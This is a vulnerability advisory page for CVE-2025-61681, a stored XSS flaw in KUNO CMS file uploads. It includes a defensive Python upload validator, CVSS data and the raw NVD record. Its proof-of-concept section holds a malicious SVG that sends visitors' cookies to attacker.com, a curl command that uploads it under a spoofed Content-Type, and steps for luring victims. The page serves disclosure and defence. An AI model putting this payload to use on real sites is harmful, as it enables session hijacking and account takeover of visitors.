Security Vulnerability Report
CVE-2025-61681 CVSS 5.4 MEDIUM

CVE-2025-61681

Published: 2025-10-03 22:15:33
Last Modified: 2026-04-15 00:35:42

Description

KUNO CMS is a fully deployable full-stack blog application. Versions 1.3.13 and below contain validation flaws in its file upload functionality that can be exploited for stored XSS. The upload endpoint only validates file types based on Content-Type headers, lacks file content analysis and extension whitelist restrictions, allowing attackers to upload SVG files containing malicious scripts (disguised as images). When users access the uploaded resource pages, arbitrary JavaScript executes in their browsers. This issue is fixed in version 1.3.14.
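A hardened form of the upload check the description says is missing, added here as an example (Python, not KUNO CMS's own code; the function names and the extension whitelist are assumptions):

```python
import os

# Extension whitelist -> magic bytes a genuine file of that type starts with.
# (Assumed whitelist for this example; adjust to the formats the site serves.)
IMAGE_SIGNATURES = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}

def looks_like_svg(data: bytes) -> bool:
    """Content sniff: SVG is XML, so markup in the leading bytes is the tell,
    whatever Content-Type the client declared."""
    head = data[:1024].lstrip().lower()
    return head.startswith(b"<?xml") or b"<svg" in head or b"<script" in head

def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). The client-sent Content-Type is deliberately
    not a parameter: it is attacker-controlled and was the vulnerable
    endpoint's only check."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext or '(none)'} not whitelisted"
    if looks_like_svg(data):
        return False, "SVG/XML markup rejected: active content"
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, f"bytes do not match a {ext} file"
    return True, "ok"

def serve_headers(ext: str) -> dict:
    """Defence in depth when serving stored uploads: derive the MIME type from
    the validated extension, forbid sniffing, and sandbox anything that slips through."""
    mime = {".png": "image/png", ".gif": "image/gif"}.get(ext, "image/jpeg")
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }

# Constructed sample: an SVG carrying a script element, renamed to look like a PNG.
SVG_WITH_SCRIPT = (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
                   b'<script>/* constructed placeholder */</script></svg>')
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed: PNG signature only

if __name__ == "__main__":
    for name, blob in [("evil.svg", SVG_WITH_SCRIPT), ("evil.png", SVG_WITH_SCRIPT),
                       ("photo.png", PNG_STUB), ("photo.jpg", PNG_STUB)]:
        print(name, validate_upload(name, blob))
```

Signature checks alone do not defeat polyglot files; decoding and re-encoding the image server-side (for example with Pillow) is the stronger content check.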

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the record; the affected range given in the description is:

KUNO CMS <= 1.3.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
SVG
<?xml version="1.0" encoding="UTF-8"?>
<!-- Malicious SVG file for Stored XSS exploitation in KUNO CMS -->
<!-- Save as evil.svg and upload with Content-Type: image/png -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <script type="text/javascript">
    // XSS payload: steal cookies and redirect to attacker server
    var cookie = document.cookie;
    var img = new Image();
    img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookie);
    // Alternative: redirect user to phishing page
    // window.location = "https://attacker.com/phishing";
    // Alternative: perform actions on behalf of user
    // fetch('/api/some-action', {method: 'POST', credentials: 'include'});
  </script>
  <rect x="0" y="0" width="200" height="200" fill="blue"/>
  <text x="50" y="100" fill="white">Image</text>
</svg>

# Exploitation steps:
# 1. Create the malicious SVG file above
# 2. Use curl or a script to upload it to KUNO CMS with modified Content-Type header:
#
#    curl -X POST https://target-kuno-cms.com/upload \
#      -H "Content-Type: multipart/form-data" \
#      -F "[email protected];type=image/png"
#
# 3. Obtain the uploaded file URL from the response
# 4. Share the URL with victims or embed it in a blog post
# 5. When victims view the page, the JavaScript executes in their browser

References

https://github.com/xuemian168/kuno/commit/fc486b5c9091b607f82bf7b354d18f25204f7dc6
https://github.com/xuemian168/kuno/releases/tag/v1.3.14
https://github.com/xuemian168/kuno/security/advisories/GHSA-q3w2-2vqp-gx3r

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61681",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T22:15:32.880",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "KUNO CMS is a fully deployable full-stack blog application. Versions 1.3.13 and below contain validation flaws in its file upload functionality that can be exploited for stored XSS. The upload endpoint only validates file types based on Content-Type headers, lacks file content analysis and extension whitelist restrictions, allowing attackers to upload SVG files containing malicious scripts (disguised as images). When users access the uploaded resource pages, arbitrary JavaScript executes in their browsers. This issue is fixed in version 1.3.14."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-434"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/xuemian168/kuno/commit/fc486b5c9091b607f82bf7b354d18f25204f7dc6", "source": "[email protected]"},
      {"url": "https://github.com/xuemian168/kuno/releases/tag/v1.3.14", "source": "[email protected]"},
      {"url": "https://github.com/xuemian168/kuno/security/advisories/GHSA-q3w2-2vqp-gx3r", "source": "[email protected]"}
    ]
  }
}